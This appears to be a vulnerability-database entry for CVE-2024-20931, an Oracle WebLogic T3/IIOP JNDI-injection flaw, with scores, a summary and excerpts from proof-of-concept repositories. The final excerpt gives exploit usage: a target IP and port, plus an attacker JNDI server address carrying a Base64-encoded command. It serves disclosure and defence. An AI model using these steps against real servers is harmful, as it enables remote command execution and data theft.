CVE-2024-20931

Published: 17/02/2024 Updated: 20/02/2024
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

Vendor Advisories

Check Point Reference: CPAI-2024-0082 Date Published: 12 Mar 2024 Severity: Critical ...

GitHub Repositories

The PoC for CVE-2024-20931

CVE-2024-20931: The PoC for CVE-2024-20931. Vulnerability Analysis: A new attack surface for JNDI injection - CVE-2024-20931 analysis

CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol

🚨 CVE-2024-20931 🚨 CVE-2024-20931 Oracle: A RCE vuln based on Weblogic T3\IIOP protocol. A new attack surface for JNDI injection - CVE-2024-20931 analysis. Introduction: In the latest official January 2024 patch released by Oracle, a remote command execution vulnerability CVE-2024-20931 based on the Weblogic T3\IIOP protocol has been fixed. This vulnerability was submitted to O

CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839

CVE-2024-20931: CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839 (Oracle Weblogic). Usage: Setup JNDI, the specific one from github.com/WhiteHSBG/JNDIExploit/. Exploit: java -jar CVE-2024-20931.jar. Please input target IP: 127.0.0.1. Please input target port: 7001. Please input RMI Address (ip:port/exp): JNDISERVER:1389/Basic/Command/Base64/BASE64COMMAND